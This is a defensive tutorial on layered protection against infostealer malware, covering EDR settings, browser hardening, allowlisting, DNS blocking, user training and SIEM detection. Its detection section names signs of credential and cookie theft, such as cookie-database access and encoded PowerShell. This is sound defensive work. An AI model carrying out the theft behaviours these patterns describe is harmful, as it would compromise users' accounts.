Infostealers run on real users’ machines, harvest browser cookies and saved passwords, and ship the lot to a Telegram channel for resale. The attack flow is short and the prevention surface is well understood, most organisations just don’t configure the controls. This is the layered-defence tutorial for an SMB or department-level admin.
Layer 1: EDR with the right config
Pick one and configure it properly. The three that consistently catch modern stealer families:
- Microsoft Defender for Endpoint, included with M365 E5, included separately with Defender for Business. The single best free-with-licence option.
- CrowdStrike Falcon, the gold standard, ~$50-100/seat/year for SMB tier.
- SentinelOne, strong competitor, similar pricing.
The configuration that matters: enable Tamper Protection, enable cloud-delivered protection (real-time threat-intel updates), enable Network Protection (blocks known-bad domains at the OS level), and enable Attack Surface Reduction rules, particularly the rules for “block credential stealing from LSASS” and “block process creation from PSExec/WMI commands.”
Defender’s specific ASR rule list is at learn.microsoft.com/defender-endpoint. Enable all of them. Audit-mode first if you want to see what fires before going to block.
Layer 2: Browser hardening
Stealers harvest cookies from the browser’s local cookie database. Two things that materially raise the bar:
Enable Chrome’s App-Bound Encryption for cookies, Microsoft, Google, and the major browsers shipped enhanced cookie-store encryption in 2024-2025 that ties cookies to a specific OS user account, making bulk extraction harder. Verify it’s enabled via chrome://flags/#enable-bound-session-credentials.
Disable saved-password storage in the browser for any account that touches sensitive systems. Force users into a password manager (1Password, Bitwarden) instead. The password manager has its own protected storage; the browser’s saved-passwords API is the single largest exfiltration target.
Enterprise: deploy this via group policy. Personal: Settings → Autofill → Passwords → turn off “Offer to save passwords.”
Layer 3: Application allowlisting
The single biggest behaviour change that prevents stealer infection: don’t run unknown executables. Application allowlisting via Windows Defender Application Control or AppLocker enforces this technically.
The reality is that small organisations rarely run allowlisting because the maintenance burden is real. The middle path is Defender’s “Block executable files from running unless they meet a prevalence, age, or trusted list criterion” ASR rule, much lighter to operate, catches a meaningful share of fresh stealer drops.
Layer 4: DNS-level blocking
Stealers exfiltrate to specific known C2 domains. DNS-level blocking catches most of them before exfil happens.
- Cloudflare Gateway, free for up to 50 users, includes a malicious-domain blocklist by default.
- NextDNS, $20/year per user, similar coverage, easier setup.
- Pi-hole with a curated blocklist, free if you have a Raspberry Pi.
Subscribe to URLhaus and FeodoTracker blocklists for fresh malware-distribution domains.
Layer 5: User training that actually works
The infection vector for most stealers in 2026 is “user pasted a PowerShell command they were told to paste”, typically from a fake CAPTCHA page or a “verification required” prompt on a malicious site. The phrasing varies but the pattern is: copy this command, paste it into Run/Terminal, hit Enter.
The training rule is simple: never paste anything into Run/Terminal/PowerShell that you didn’t write yourself. Every other rule is a corollary. Reinforce it monthly.
Layer 6: Detection, assume infection sometimes
Stealer detection patterns that work in EDR/SIEM:
- Non-browser process accessing the Chrome/Edge cookie database file
- Outbound HTTPS POST to recently-registered domains, large body size, no referrer
- Encrypted ZIP/RAR files written to %TEMP% then immediately uploaded
- Powershell -EncodedCommand or -enc with base64 payload from clipboard
Each of these is a detection rule worth writing. Sigma rule repositories on GitHub have community-maintained versions you can lift directly.
The maintenance cycle
Quarterly: review EDR alert volumes, tune the false positives, refresh the DNS blocklist sources. Monthly: check Hudson Rock or your monitoring service for new exposures. Continuously: when an infection is found, do the post-mortem to figure out which layer let it through, and patch that layer.
No single control catches every stealer. Layered, the success rate is high enough that infections become rare events worth investigating thoroughly when they do happen, instead of a constant background hum.